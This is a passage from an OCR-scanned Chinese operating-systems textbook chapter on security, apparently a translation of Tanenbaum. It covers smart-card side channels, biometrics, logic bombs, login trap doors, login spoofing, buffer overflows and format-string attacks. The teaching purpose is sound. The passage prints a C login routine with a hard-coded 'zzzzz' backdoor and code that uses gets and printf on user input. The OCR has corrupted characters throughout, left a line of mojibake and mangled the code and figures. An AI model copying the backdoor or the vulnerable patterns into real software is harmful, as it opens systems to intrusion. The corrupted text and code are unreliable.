信 协 议 下 载 到 卡片 中 ， 并 解释 运行 。 通 过 这 种 方法 ， 即 使 协议 被 损坏 ， 
也 能 够 在 全 球 范 围 内 方便 地 下 载 一 个 新 的 协议 ， 使 得 下 一 次 使 用 智能 卡 
时 ， 该 协议 处 于 完好 的 状态 。 这 种 方法 的 缺点 是 让 本 来 就 速度 慢 的 智能 
卡 更 慢 了 ， 但 是 随 独 技术 的 发 展 这 种 方法 将 被 广泛 使 用 。 智 能 卡 的 另 一 
个 缺点 是 丢失 或 被 盗 的 卡片 可 以 让 不 法 分 子 实施 劳 道 攻击 〈side-channel 
attack) ， 例 如 功率 分 析 攻 击 。 他 们 中 的 专家 通过 观察 智能 卡 在 执行 加 








密 操作 时 的 电源 功率 损耗 ， 可 以 运用 适当 的 设备 推算 出 密 钥 。 也 可 以 让 
智能 卡 对 特定 的 密 钥 进行 加 密 操 作 ， 从 加 密 的 时 间 来 推算 出 卡片 密 钥 的 
有 关 信 息 。 





U ”飞行 里 数 卡 是 信用 卡 的 一 种 ， 通 过 这 类 信用 卡 结账 时 ， 可 以 将 消费 
的 金额 换算 成 航班 的 飞行 里 数 ， 消 费 到 一 定金 额 时 ， 可 能 兑换 免费 机 
译 者 注 





3 
Wo 


9.4.3 ”使 用 生物 识别 的 验证 方式 





第 三 种 方法 是 对 用 户 的 某 些 物 理 特征 进行 验证 ， 并 且 这 些 特征 很 难 
伪造 。 这 种 方法 叫做 生物 识别 〈Pankanti 等 人 ,2000) 。 如 接 通 在 电脑 上 
的 指纹 或 声音 识别 器 可 以 对 用 记号 份 进行 校 验 。 





一 个 典型 的 生物 识别 系统 由 两 部 分 组 成 : 注册 部 分 和 识别 部 分 。 在 
注册 部 分 中 ， 用 户 的 特征 被 数字 化 储存 ， 并 把 最 重要 的 识别 信息 抽取 后 
存放 在 用 户 记 录 中 。 存 放 方 式 可 以 是 中 心 数据 库 《〈 如 用 于 远程 计算 机 登 
录 的 数据 库 ) 或 用 户 随 喘 携带 的 智能 卡 并 在 识别 时 插入 远程 读 卡 器 (如 
ATM 机 ) 。 








男 一 个 部 分 是 识别 部 分 。 在 使 用 时 ， 首 先 由 用 户 输入 登录 名 ， 然 后 
系统 进行 识别 。 如 果 识 别 到 的 信息 与 注册 时 的 样本 信息 相同 ， 则 允许 登 
录 ， 合 则 束 拒 绝 登 录 。 这 时 仍然 需要 使 用 登录 名 ， 因 为 仅仅 根据 检测 到 
的 识别 信息 来 判断 是 不 严格 的 ， 只 有 识别 部 分 的 信息 会 增加 对 识别 信息 
的 排序 和 检索 难度 。 也 许 茶 两 个 人 会 共有 相同 的 生物 特征 ， 所 以 要 求生 
物 特征 还 要 匹配 特定 用 户 丑 份 的 安全 性 比 只 要 求 臣 配 一 般 用 户 的 生物 特 
征 要 强 得 多 。 








被 选用 的 识别 特征 必须 有 足够 的 可 变性 ， 这 样 系统 可 以 准确 无 误 地 
区 分 大 量 的 用 户 。 例 如 ， 头 发 闫 色 就 不 是 一 个 好 的 特征 ， 因 为 许多 人 都 


拥有 相同 颜色 的 头发 。 而 且 ， 被 选用 的 特征 不 应 该 经 党 发 生变 化 《〈 对 于 
一 些 人 而 言 ， 头 发 并 不 具有 这 个 特性 ) 。 例 如 ， 人 的 声音 由 于 感冒 会 变 
化 ， 而 人 的 脸 会 由 于 留 衣 子 或 化 妆 而 与 注册 时 的 样本 不 同 。 既 然 样本 信 
恩 永 远 也 不 会 与 以 后 识别 到 的 信息 完全 符合 ， 那 么 系统 设计 人 员 就 要 决 
定 识 别 的 精度 有 多 大 。 在 极端 情况 下 ， 设 计 人 员 必 须 考虑 系统 也 许 不 得 
不 偶尔 拒绝 一 个 合法 用 户 ， 但 恰巧 让 一 个 乔装 打扮 者 进入 系统 。 对 电子 
商务 网 站 来 说 ， 拒 绝 一 名 合法 用 户 比 遭受 一 小 部 分 诈骗 的 损失 要 严重 得 
多 ， 而 对 核武 融 网 站 来 说 ， 拒 绝 正 式 员工 的 到 访 比 让 陌生 人 一 年 进入 几 




















现在 让 我 们 来 看 一 看 实际 应 用 的 一 些 生物 识别 方式 。 一 个 令 人 有 些 
惊奇 的 方式 是 使 用 手指 长 短 进行 识别 。 在 使 用 该 方法 时 ， 每 一 个 终端 都 
有 如 图 9-21 所 示 的 装置 。 用 户 把 手 插 进 装置 里 ， 系 统 就 会 对 手指 的 长 短 
进行 测量 并 与 数据 库 里 的 样本 进行 核对 。 














图 9-21 一 种 测量 手指 长 度 的 装置 


然而 ， 手 指 长 度 识 别 并 不 是 令 人 满意 的 方式 。 系 统 可 能 遭受 手指 石 
这 模型 或 其 他 仿制 品 的 攻击 ， 也 许 入 侵 者 还 可 以 调节 手指 的 长 度 以 便 进 
行 实验 。 


另 一 种 目前 被 广泛 应 用 于 商业 的 生物 识别 模式 是 虹膜 识别 技术 。 储 
何 两 个 人 都 具有 不 同 的 视网膜 组 织 血管 《〈patterns) ， 即 使 是 同 卵 双胞胎 
也 不 例外 ， 因 此 虹膜 识别 与 指纹 识别 同样 可 靠 ， 而 且 更 加 容易 实现 目 动 
4 (Daugman,2004) 。 用 户 的 视网膜 可 以 由 一 米 以 外 的 照相 机 拍照 并 通 
过 gabor 小 流 〈gabor wavelet) 变换 的 方式 所 取 某 些 特征 信息 ， 并 且 将 结 

















果 压 给 为 256 字 节 。 该 结果 在 用 户 登 录 的 时 候 与 现场 采样 结果 进行 比 
较 ， 如 果 两 者 的 汉 明 距离 (hamming distance) 小 于 某 个 阔 值 ， 则 该 用 
户 通过 验证 《两 个 比特 字 串 之 间 的 汉 明 距离 指 从 一 个 比特 串 变 换 为 另 一 
个 比特 串 最 少 需要 变化 的 比特 数 ) 。 





任何 依靠 图 像 进行 识别 的 技术 都 有 可 能 被 假冒 。 例 如 ， 茶 人 可 以 戴 
上 层 镜 靠近 ATM 机 前 的 照相 机 ， 墨 镜 上 贴 着 别人 的 视网膜 。 毕 竟 ， 如 
果 ATM 机 的 照相 机 可 以 在 1 米 距 离 担 摄 视网膜 照片 ， 那 么 其 他 人 也 可 以 
这 么 做 ， 甚 至 长 距离 地 使 用 镜头 。 出 于 这 个 原因 ， 还 必须 采取 一 些 额外 
的 对 策 ， 例 如 在 照相 的 时 候 使 用 内 区 灯 一 一 并 不 是 为 了 增加 交 的 强度 ， 
而 是 为 了 观察 担 摄 到 的 瞳孔 是 人 否 会 在 强 光 下 收缩， 或 用 于 确定 所 担 摄 到 
的 瞳孔 是 否 是 摄影 初学 者 的 拙 作 《〈 此 时 红眼 效应 会 在 内 光 灯 下 出 现 ， 然 
而 当 关 闭 闪 光 灯 后 ， 则 看 不 到 红眼 ) 。 阿 姆 斯 特 丹 机 场 从 2001 年 起 就 开 
始 使 用 虹膜 识别 扩 术 以 便 使 得 经 常 出 入 机 场 的 常客 得 以 跳 过 第 规 安检 流 


程 。 











还 有 一 种 技术 叫做 签名 分 析 。 有 用户 使 用 一 种 特殊 的 笔 签 名 ， 笔 与 终 
端 相连 。 计 算 机 将 签名 与 在 线 存放 的 或 智能 卡 里 的 已 知 样本 进行 比较 。 
更 好 的 一 种 办 法 是 不 去 比较 签名 ， 而 是 比较 笔 的 移动 轨迹 及 书写 签名 时 
产生 的 压力 。 一 个 好 的 伪造 者 也 许 能 够 复制 釜 名 ， 但 对 笔画 顺序 和 书写 
的 压力 与 速度 却 曼 无 办 法 。 


还 有 一 种 依靠 迷你 闭 置 识别 的 技术 是 声音 测定 








(Markowitz,2000) 。 整 个 装置 只 需要 一 个 关 殉 风 (或 者 甚至 是 一 部 电 
话 ) 和 有 关 的 软件 即 可 。 声 音 测定 技术 与 声音 识别 技术 不 同 。 后 者 是 为 
了 识别 人 们 说 了 些 什么 ， 而 前 者 是 为 了 判断 人 们 的 身份 。 有 些 系 统 仅仅 
要 求 用 户 说 一 名 密码 ， 但 是 窃听 者 可 以 把 这 句 话 录 下 来 ， 通 过 回放 来 进 
入 系统 。 更 先进 的 系统 向 用 户 说 一 些 话 并 要 求 重 述 ， 用 户 每 次 登录 叙述 
的 都 是 不 同 的 语句 。 有 些 公司 开始 在 软件 中 使 用 声音 测定 技术 ， 如 通过 
电话 线 连 接 使 用 的 家 庭 购物 软件 。 在 这 种 情况 下 ， 声 音 测 定 比 用 PIN 密 
码 要 安全 得 多 。 











我 们 可 以 继续 给 出 许多 例子 ， 但 是 有 两 个 例子 特别 有 助 于 我 们 理 
解 。 猫 和 其 他 一 些 动物 通过 小 便 来 划 定 上 自己 的 地 盘 。 很 明显 ， 猫 通过 这 
种 方法 可 以 相互 识别 自己 的 家 。 假 设 茶 人 拿 着 一 个 可 以 进行 尿 液 分 析 的 
装置 ， 那 么 他 就 可 以 建立 识别 样本 。 每 个 终端 都 可 以 有 这 样 的 装置 ， 装 
置 前 放 着 一 条 标语 :“ 要 登录 系统 ， 请 留 下 样本 。” 这 也 许 是 一 个 绝对 无 
法 攻破 的 系统 ， 但 用 户 可 能 难以 接受 使 用 这 样 的 系统 。 





在 使 用 指纹 识别 装置 和 小 型 谱 仪 时 也 可 能 发 生 同 样 的 情况 。 用 户 会 
被 要 求 按 下 大 拇指 并 抽取 一 泣 血 进行 化 验 分 机 。 问 题 在 于 任何 验证 识别 
系统 对 用 户 来 说 应 该 从 心理 上 是 可 接受 的 。 手 指 长 度 识别 也 许 不 会 引起 
什么 麻烦 ， 但 是 类 似 于 在 线 存储 指纹 等 方式 虽然 减少 了 入 侵 的 可 能 ， 但 
对 大 多 数 人 来 说 是 不 可 接受 的 。 因 为 他 们 将 指纹 和 犯人 联系 在 一 起 。 





9.5 内 部 攻击 


前 几 闻 对 于 用 户 认 证 工作 原理 的 一 些 细 市 问题 已 经 有 所 讨论 。 不 六 
的 是 ， 阻 止 不 速 之 客 登 录 系统 仅仅 是 众多 安全 问题 中 的 一 个 。 为 一 个 完 
全 不 同 的 领域 可 以 被 定义 为 “内 部 攻击 ”(inside jobs) ， 内 部 攻击 由 一 些 
公司 的 编程 人 员 或 使 用 这 些 受 保护 的 计算 机 、 编 制 核 心软 件 的 员工 实 
施 。 来 目 内 部 攻击 与 外 部 攻击 的 区 别 在 于 ， 内 部 攻击 者 拥有 外 部 人 员 所 
不 具备 的 专业 知识 和 访问 权限 。 下 面 我 们 将 给 出 一 些 内 部 攻击 的 例子 ， 
这 些 攻击 方式 曾经 非常 频 党 地 出 现在 公司 中 。 根 据 攻击 者 、 被 攻击 者 以 
及 攻击 者 想 要 达到 的 目的 这 三 方面 的 不 同 ， 每 种 攻击 都 具有 不 同 的 特 
点 。 

















9.5.1 逻辑 炸弹 





在 软件 外 包 盛 行 的 时 代 ， 程 序 员 总 是 很 担心 他 们 会 失去 工作 ， 有 时 
候 他 们 甚至 会 采取 某 些 措施 来 减轻 这 种 担心 。 对 于 感受 到 失业 威胁 的 程 
序 员 ， 编 号 逻辑 炸弹 Clogic bomb) 就 成 为 了 一 种 策略 。 这 一 装置 是 某 
些 公司 程序 员 《〈 当 前 被 雇用 的 ) 写 的 程序 代码 ， 并 被 秘密 地 放 入 产品 的 
操作 系统 中 。 只 要 程序 员 每 天 输入 口令 ， 产 品 就 相安 无 事 。 但 是 一 旦 程 
序 员 被 突然 解雇 并 坚 无 警告 地 被 要 求 离开 时 ， 第 二 天 《或 第 二 周 ) 逻辑 
炸弹 就 会 因 得 不 到 口令 而 改作。 当然 也 可 以 在 逻辑 炸弹 里 设置 多 个 变 





量 。 一 个 非常 有 名 的 例子 是 : 逻辑 炸弹 每 天 核对 薪水 册 。 如 果 某 程序 员 
的 工 号 没有 在 连续 两 个 发 薪 日 中 出 现 ， 罗 辑 炸弹 就 发 作 了 (Spafford: 
人 ,1989) 。 


逻辑 炸弹 发 作 时 可 能 会 探 去 磁盘 ， 随 机 删除 文件 ， 对 核心 程序 做 难 
以 友 现 的 改动 ， 或 者 对 原始 文件 进行 加 密 。 在 后 面 的 例子 中 ， 公 司 对 古 
人 否 要 叫 警 察 带 走 放置 逻辑 炸弹 的 员工 进退 两 难 〈 报 警 存在 着 导致 数 月 后 
对 该 员工 宣判 有 徘 的 可 能 ， 但 却 无 法 恢复 丢失 的 文件 ) 。 或 者 届 服 该 员 
工 对 公司 的 敲诈 ， 将 其 重新 雇用 为 "顾问 ?来 避免 如 同 天 文 数字 般 的 补 
救 ， 并 依 此 作为 解决 问题 的 交换 条 件 〈 公 司 也 同时 期 望 他 不 会 再 放置 新 
的 逻辑 炸弹 ) 。 








在 很 多 有 记录 的 案例 中 ， 病 毒 癌 被 其 感染 的 计算 机 中 植 入 逻辑 炸 
弹 。 一 般 情况 下 ， 这 些 逻 辑 炸弹 修 设 计 为 在 未 来 的 某 个 时 间 “ 爆 炸 ”"。 然 
而 ， 由 于 程序 员 无 法 预知 那 一 人 台 计 算 机 将 会 被 攻击 ， 因 此 馆 辑 炸弹 无 法 
用 于 保护 目 己 不 失业 ， 也 无 法 用 尸 勒索 。 这 些 馆 辑 炸 弹 通 利 会 家 设 定 为 
在 政治 上 有 重要 意义 的 日 子 爆炸 ， 因 此 它们 也 称 做 时 间 炸 弹 (time 
bomb) 。 








9.5.2 后门 陷阱 





另 一 个 由 内 部 人 员 造 成 的 安全 漏洞 是 后 门 陷 阱 〈trap door) 。 这 一 
问题 是 由 系统 程序 员 跳 过 一 些 通常 的 检测 并 插入 一 段 代 码 造 成 的 。 如 程 
序 员 可 以 在 登录 程序 中 插入 一 小 段 代码 ， 让 所 有 使 用 “zzzzz” 登 录 名 的 用 
户 成 功 登 录 而 无 论 密 码 文件 中 的 密码 是 什么 。 正 和 常 的 程序 代码 如 图 9- 
22a 所 示 。 改 成 后 门 陷阱 程序 的 代码 如 图 9-22b 所 示 。stremp 这 行 代码 的 
调用 是 为 了 判断 登录 名 是 否 为 “zzzzz”。 如 果 是 ， 则 无 论 输入 了 什么 密码 
都 可 以 登录 。 如 果 后 门 陷阱 被 程序 员 放 入 到 计算 机 生产 商 的 产品 中 并 赖 
洋 过 海 ， 那 么 程序 员 日 后 就 可 以 任意 登录 到 这 家 公司 生产 的 计算 机 上 ， 
而 无 论 谁 拥有 它 或 密码 是 什么 。 后 门 陷阱 程序 的 实质 是 它 跳 过 了 正 弟 的 
认证 过 程 。 

















while (TRUE) { while (TRUE) { 
printf("login: "); printf("login: "); 
get_string(name); get_string(name); 
disable_echoing( ); disable_echoing( ); 
printf("password: "); printf("password: "); 
get_string(password); get_string(password); 
enable_echoing( ); enable_echoing( ); 
v = check_validity(name, password); v = check_validity(name, password); 
if (v) break; if (v Il stremp(name, "zzzzz") == 0) break; 





} 
execute_shell(name); execute_shell(name); 


a) b) 


图 9-22 让 正常 的 代码 ; pb) 插入 了 后 门 陷阱 的 代码 


对 公司 来 说 ， 防 止 后 门 的 一 个 方法 是 把 代码 审查 《〈code review) 作 
为 标准 惯例 来 执行 。 通 过 这 一 技术 ， 一 旦 程序 员 完 成 对 东 个 模块 的 编写 
和 测试 后 ， 该 模块 被 放 入 代码 数据 库 中 进行 检验 。 开 发 小 组 里 的 所 有 程 
序 员 周 期 性 地 聚会 ， 每 个 人 在 小 组 面前 同 大 家 解释 每 行 代码 的 含义 。 这 
样 做 不 仅 增 加 了 找 出 后 门 代 码 的 机 会 ， 而 且 增 加 了 大 家 的 员 任 感 ， 被 抓 
出 来 的 程序 员 也 知道 这 样 做 会 损害 自己 的 职业 生涯 。 如 果 该 建议 遭 到 了 
太 多 的 反对 ， 那 么 让 两 个 程序 员 相互 检查 代码 也 是 一 个 可 行 的 方法 。 

















9.5.3 Sao 


这 种 内 部 攻击 的 实施 者 是 系统 的 合法 用 户 ， 然 而 这 些 合法 用 户 却 试 
图 通过 登录 欺骗 的 手段 获取 他 人 的 密码 。 这 种 攻击 通常 发 生 在 一 个 具有 
大 量 多 用 户 公 用 计算 机 的 局 域 网 内 。 很 多 大 学 就 有 可 以 供 学 生 使 用 的 机 
房 ， 学 生 可 以 在 任意 一 台 计 算 机 上 进行 登录 。 登 录 欺骗 (login 
spoofing) 。 它 是 这 样 工作 的 : 通常 当 没 有 人 登录 到 UNIX 终 站 或 局 域 网 
上 的 工作 站 时 ， 会 显示 如 图 9-23a 所 示 的 屏幕 。 当 用 户 坐 下 来 输入 登录 
名 后 ， 系 统 会 要 求 输入 口令 。 如 果 口 令 正 确 ， 用 户 就 可 以 登录 并 启动 
shell 《也 有 可 能 是 GUI) 程序 。 








现在 我 们 来 看 一 看 这 一 情节 。 一 个 恶意 的 用 户 Mal 写 了 一 个 程序 可 
以 显示 如 图 9-23b 所 示 的 图 像 。 除 了 内 部 没有 运行 登录 程序 外 ， 它 看 上 
去 和 9-23a 尺 人 的 相似 ， 这 不 过 是 骗 人 。 现 在 Mal 启 动 了 他 的 程序 ， 便 可 
以 躲 在 远 处 看 好 戏 了 。 当 用 户 坐 下 来 输入 登录 名 后 ， 程 序 要 求 输入 口令 
并 屏蔽 了 响应 。 随 后 ， 登 录 名 和 口令 后 被 写 入 文件 并 发 出 信号 要 求 系统 
结束 shell 程 序 。 这 使 得 Mal 能 够 正常 退出 登录 并 触发 真正 的 登录 程序 ， 
如 图 9-23a 所 示 。 好 像 是 用 户 出 现 了 一 个 拼写 错误 并 要 求 再 次 登录 ， 这 
时 真正 的 登录 程序 开始 工作 了 。 但 与 此 同时 Mal 又 得 到 了 男 一 对 组 合 
(登录 名 和 口令 ) 。 通 过 在 多 个 终端 上 进行 登录 欺骗 ， 入 侵 者 可 收集 到 
多 个 口令 。 

















a) b) 


图 9-23 a 正 确 的 登录 屏幕 ;b) 假 冒 的 登录 屏幕 








防止 登录 欺骗 的 惟一 实用 的 办 法 是 将 登录 序列 与 用 户 程序 不 能 捕捉 
的 键 组 合 起 来 。Windows 为 此 目的 采用 了 Ctrl-Alt-Del。 如 采用 户 坐 在 终 
端 前 开始 按 Ctrl-Alt-Del， 当 前 用 户 就 会 被 注销 并 局 动 新 的 登录 程序 。 没 
有 任何 办 法 可 以 跳 过 这 一 步 。 





9.6 利用 代码 漏洞 


前 面 已 经 介绍 了 内 部 人 员 是 如 何 危 害 系 统 安全 的 ， 在 本 市 中 ， 我 们 
将 介绍 外 部 人 员 (outsider) 《主要 通过 互联 网 ) 对 操作 系统 进行 攻击 
和 破坏 的 方式 。 几 乎 所 有 的 攻击 机 制 都 利用 了 操作 系统 或 是 被 广泛 使 用 
的 软件 《如 正 浏 览 器 和 微软 Office) 中 的 漏洞 。 一 种 典型 的 攻击 形成 方 
式 是 ， 有 人 发 现 了 操作 系统 中 的 一 个 漏洞 ， 接 着 发 现 如 何 利用 该 漏洞 攻 
击 计算 机 。 





每 一 种 攻击 都 涉及 特定 程序 中 的 特定 漏洞 ， 其 中 利用 茶 些 反复 出 现 
的 漏洞 展开 的 攻击 值得 我 们 学 习 。 在 本 节 中 ， 我 们 将 研究 一 些 攻击 的 工 
作 原 理 ， 由 于 本 书 的 核心 是 操作 系统 ， 因 此 重点 将 放 在 如 何 攻击 操作 系 
统 上 ， 而 利用 系统 和 软件 漏洞 对 网 页 和 数据 库 的 攻击 方式 本 市 都 没有 涉 
及 。 





有 很 多 方式 可 以 对 漏洞 进行 利用 ， 在 一 种 直接 的 方法 中 ， 攻 击 者 会 
局 动 一 个 脚本 ， 该 脚本 按 顺 序 进行 如 下 活动 : 








1 运行 目 动 端口 扫描 ， 以 碍 找 接 受 远程 连接 的 计算 机 。 


2) 笠 试 通过 猜测 用 户 名 和 密码 进行 登录 。 








3) 一 旦 登录 成 功 ， 则 月 动 特定 的 具有 漏洞 的 程序 ， 并 产生 输入 使 得 


程序 中 的 漏洞 被 触发 。 
4 如果 该 程序 运行 SETUID 到 root， 则 创建 一 个 SETUID root shell. 


5) 尼 动 一 个 僵尸 程序 ， 监 听 卫 端口 的 指令 。 





6) 对 目标 机 器 进行 配置 ， 确 保 该 僵尸 程序 在 系统 每 次 重新 启动 后 都 


会 自动 运行 。 








上 述 脚 本 可 能 会 运行 很 长 时 间 ， 但 是 它 有 很 可 能 最 终 成 功 。 攻 击 者 
确保 只 要 目标 计算 机 重新 局 动 时 ， 人 和 僵尸 程序 也 司 动 ， 就 使 得 这 人 台 计 算 机 
一 直 被 控制 。 











另 一 种 常用 的 攻击 方式 利用 了 已 经 感染 病毒 的 计算 机 ， 在 该 计算 机 
登录 到 其 他 机 器 的 时 候 ， 计 算 机 中 的 病毒 司 动 目标 机 需 中 的 漏洞 程序 
(就 像 上 面 提 到 的 脚本 一 样 ，。 基 本 上 只 有 第 一 步 和 第 二 步 与 上 述 脚 本 
文件 不 同 ， 其 他 步骤 仍然 适用 。 不 论 哪 种 方法 ， 攻 击 者 的 程序 总 是 要 在 
目标 机 需 中 运行 ， 而 该 机 器 的 所 有 者 对 该 恶意 程序 一 无 所 知 。 














9.6.1 缓冲 区 洲 出 攻击 


之 所 以 有 如 此 多 的 攻击 是 因为 操作 系统 和 其 他 应 用 程序 都 是 用 C 语 
言 写 的 〈 因 为 程序 员 喜 欢 它 ， 并 且 用 它 来 进行 有 效 的 编译 ) 。 但 遗憾 的 
是 ， 没 有 一 个 C 编 译 器 可 以 做 到 数组 边界 检查 。 如 下 面 的 代码 虽然 并 不 





合法 ， 但 系统 却 没 有 进行 检验 : 








int I; 
char c[1024]; 
1=12000; 
c[i]=0; 





结果 内 存 中 有 10 976 个 字 市 超出 了 数组 c 的 范围 ， 并 有 可 能 导致 危险 
的 后 果 。 在 运行 时 没有 进行 任何 检查 来 避免 这 种 情况 。 








C 语 言 的 属性 导致 了 下 列 攻 击 。 在 图 9-24a 中 ， 我 们 看 到 主 程序 在 运 
行 时 局 部 变量 是 放 在 栈 里 的 。 在 某 些 情况 下 ， 系 统 会 调用 过 程 A， 如 图 
9-24b 所 示 。 标 准 的 调用 步骤 是 把 返回 地 址 〈 指 回调 用 语句 之 后 的 指 
令 ) 压 入 栈 ， 然 后 将 程序 的 控制 权 交 给 A， 由 A 不 断 减 少 栈 指 针 地 址 来 
分 配 本 地 变量 的 存储 空间 。 























虚拟 地 址 空间 虚拟 地 址 空间 虚拟 地 址 空间 
OxFFFF... ero 

ae 主 程序 的 主 程序 的 
堆栈 局 部 变量 局 部 变量 局 部 变量 
指针 


A 的 局 部 
变量 


A 的 局 部 
变量 


返回 地 址 “| 
"D 





图 9-24 如 主 程序 运行 时 的 情况 ; b) 调 用 过 程 A 后 的 情况 ; 灰色 字体 
表示 的 缓冲 溢出 





假设 过 程 A 的 任务 是 得 到 完整 的 路 径 〈 可 能 是 把 当前 目录 路 径 和 文 
件 名 串联 起 来 ) ， 然 后 打开 文件 实施 一 些 操作 。A 拥 有 固定 长 度 的 缓冲 
区 《如 数组 ) B， 它 存放 着 文件 名 ， 如 图 9-24b 所 示 。 使 用 定 长 缓冲 区 存 
放 文 件 名 比 起 先 检 测 实际 大 小 再 动态 分 配 空间 要 容易 得 多 。 如 果 缓 冲 区 
只 有 1024 个 字 节 ， 那 么 能 够 放 得 下 所 有 的 文件 名 吗 ? 特别 是 当 操 作 系 统 
把 文件 名 的 长 度 限制 (或 者 更 好 的 是 对 全 路 径 名 的 长 度 限制 ) 在 不 超过 
255 【或 其 他 固定 的 长 度 ) 个 字符 时 。 











然而 ， 上 述 推论 有 致命 的 错误 。 假 设 用 户 提供 了 一 个 长 达 2000 个 字 
符 的 文件 名 ， 在 使 用 时 就 会 出 错 ， 但 攻击 者 却 不 予 理会 。 当 过 程 A 把 文 
件 名 复制 到 缓冲 区 时 ， 文 件 名 溢出 并 歼 盖 了 图 9-24c 的 灰色 部 分 。 更 糖 
re, WR SCRA HBR, CERA mB HE, ORE REA E 
时 ， 返 回 地 址 是 从 文件 名 的 中 间 截 取 的 。 如 果 这 一 地 址 是 随机 数 ， 系 统 
将 跳 到 该 随机 地 址 ， 并 可 能 引起 一 系列 的 误 操 作 。 








但 是 如 果 文 件 名 没有 包含 菜 些 随机 地 址 会 怎么 样 呢 ?如 果 它 包含 的 
古 有 效 的 二 进 制 地 址 并 且 设计 得 十 分 吻合 茶 个 过 程 的 起 始 地 址 ， 那 又 会 
怎么 样 呢 ? 例如 吻合 过 程 B 的 起 始 地 址 。 如 果真 是 这 样 ， 那 么 当 过 程 A 
运行 结束 后 ， 过 程 B 就 开始 运行 。 实 际 上 ， 攻 击 者 会 用 他 的 恶意 代码 来 
履 盖 内 存 中 的 原 有 人 代码， 并且 让 这 些 代码 被 执行 。 





同样 的 技巧 还 运用 于 文件 名 之 外 的 其 他 场合 。 如 用 在 对 较 长 的 环境 
变量 串 、 用 户 输 入 或 任何 程序 员 创建 了 定 长 缓冲 区 并 需要 用 户 输入 变量 
的 场合 。 通 过 手工 输入 一 个 含有 运行 程序 的 串 ， 就 有 可 能 将 这 段 程序 装 
入 到 栈 并 让 它 运 行 。C 语 言 函 数 库 的 gets 函 数 可 以 把 (未 知 大 小 的 ) 串 
变量 读 入 定 长 的 缓冲 区 里 ， 但 并 不 校 验 是 否 洲 出 ， 这 样 就 很 容易 遭受 攻 
击 。 有 些 编译 器 甚至 通过 检查 gets 的 使 用 来 发 出 警告 。 








现在 我 们 来 讨论 最 坏 的 部 分 。 假 设 被 攻击 的 UNIX 程 序 的 SETUID 为 
root 〈 或 在 Windows 里 拥有 管理 员 权限 的 程序 ) ， 被 插入 的 代码 可 以 进 
行 两 次 系统 调用 ， 把 攻击 者 磁盘 里 的 shell 文 件 的 权限 改 为 SETUID root 
的 权限 ， 这 样 当 程序 运行 时 攻击 者 就 拥有 了 超级 用 户 的 权限 。 或 者 ， 攻 
击 者 可 以 映射 进 一 个 特定 的 共享 文件 库 ， 从 而 实施 各 种 各 样 的 破坏 。 还 
可 以 十 分 容易 地 通过 exec 系 统 调用 来 覆盖 当前 shel 中 运行 的 程序 ， 并 利 
用 超级 用 户 的 权限 建立 新 的 shell。 











更 糟 的 是 ， 恶 意 代码 可 以 通过 互联 网 下 载 程序 或 脚本 ， 并 将 其 存储 
在 本 地 磁盘 上 。 此 后 该 恶意 代码 就 可 以 创建 一 个 进程 直接 从 本 地 运行 恶 
意 程序 或 是 脚本 。 该 进程 可 以 一 直 监 听 IP 端 口 ， 从 而 等 待 攻击 者 的 命 
令 ， 这 将 目标 机 器 变 为 僵尸 。 恶 意 代码 必须 保证 每 次 机 器 局 动 后 ， 恶 意 
程序 或 脚本 可 以 被 启动 ， 然 而 不 论 在 Windows 或 所 有 版 本 的 UNIX 系 统 
下 ， 这 都 是 很 容易 实现 的 。 

















绝 大 多 数 系统 安全 问题 都 与 缓冲 区 洲 出 漏洞 相关 ， 而 这 类 漏洞 很 难 





被 修复 ， 因 为 已 有 的 大 量 C 代 码 都 没有 对 缓冲 区 洪 出 进行 检查 。 


9.6.2 ”格式 化 字符 串 攻 击 








尽管 很 多 程序 员 都 是 很 好 的 打字 员 ， 但 事实 上 他 们 都 不 愿意 打字 。 
将 变量 名 reference_count 缩 写 为 rc 表达 了 相同 的 意思 ， 却 可 以 在 每 次 使 
用 该 变量 的 时 候 减 少 了 13 个 字符 的 输入 ， 对 程序 员 来 说 何 乐 而 不 为 呢 ? 
然而 这 种 偷懒 行为 在 下 面 描述 的 情况 中 ， 却 可 能 导致 系统 灾难 性 地 崩 











VE 
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考虑 下 面 的 C 程 序 代码 片段 ， 该 段 代码 打印 了 一 段 欢 迎 信息 : 





char *s="Hello World"; 
printf ("%s",s); 








在 这 段 代 码 声 明了 一 个 字符 指针 类 型 的 变量 s， 该 变量 被 初始 化 指 
向 一 个 字符 串 “Hello World”， 注 意 在 这 个 字符 串 的 末尾 有 一 个 额外 的 字 
符 ^0' 用 以 标记 该 字符 串 的 结束 。 函 数 printf 被 传 入 两 个 参数 ， 其 中 格式 
化 字符 串 “%s” 指 定 系 统 接 下 来 打印 的 是 一 个 字符 串 ， 第 二 个 参数 s 则 告 
诉 printf 该 字符 串 的 起 始 地 址 。 当 被 执行 的 时 候 ， 这 段 代 码 会 在 屏幕 上 
打印 出 “Hello World”( 在 任何 标准 输出 中 ， 都 可 以 成 功 执行 〉。 


但 是 ， 如 果 程 序 员 懒惰 地 将 上 述 代 码 段 写 为 : 





char *s="Hello World"; 
printf (s); 








这 样 调用 printf 是 合法 的 ， 因 为 printf 具 有 可 变 个 数 的 参数 ， 其 中 第 
一 个 参数 必须 是 格式 化 字符 串 (Format String) ， 当 然 不 包括 任何 格式 
言 思 《如 “9%s”) 的 字符 串 也 是 允许 的 ， 所 以 尽管 第 二 种 编程 风格 并 不 推 
荐 ， 但 在 这 里 并 不 会 出 问题 ， 而 且 它 还 使 得 程序 员 少 敲 了 五 个 按键 ， 似 
乎 是 不 错 的 改进 。 








6 个 月 以 后 ， 其 他 程序 员 要 求 对 这 段 代码 进行 修改 ， 首 移 询 问 用 户 
的 姓名 ， 在 对 该 用 户 发 出 特定 的 欢迎 信息 。 在 草率 阅读 完 原先 的 代码 
后 ， 该 程序 员 只 做 了 一 点 改变 : 




















char s[100],9g[100]="Hello";/* 声 明 数 组 Ss: 和 g， 并 初始 化 g*/ 
gets (s);/* 从 键盘 读 取 字符 串 ， 存 放 到 数组 s 中 */ 

strcat (g, s);/* 把 s 连 接 到 g 的 末尾 */ 

printf (g) ;/* 输 出 g*/ 




















这 段 代 码 首先 将 用 户 输入 的 字符 串 存 入 s， 然 后 将 s 连 接 到 已 经 被 初 
始 化 的 字符 串 g 之 后 ， 以 在 g 中 形成 最 终 的 输出 信息 。 到 现在 这 种 方式 依 
然 能 够 正确 地 显示 结果 〈gets 函 数 很 容易 遭受 缓冲 区 六 出 攻击 ， 然 而 由 
于 其 便于 书写 ， 因 此 到 现在 依然 流行 ) 。 


然而 ， 如 宁 一 个 对 C 语 言 有 所 了 解 的 用 户 看 到 了 这 段 代码 ， 他 会 立 
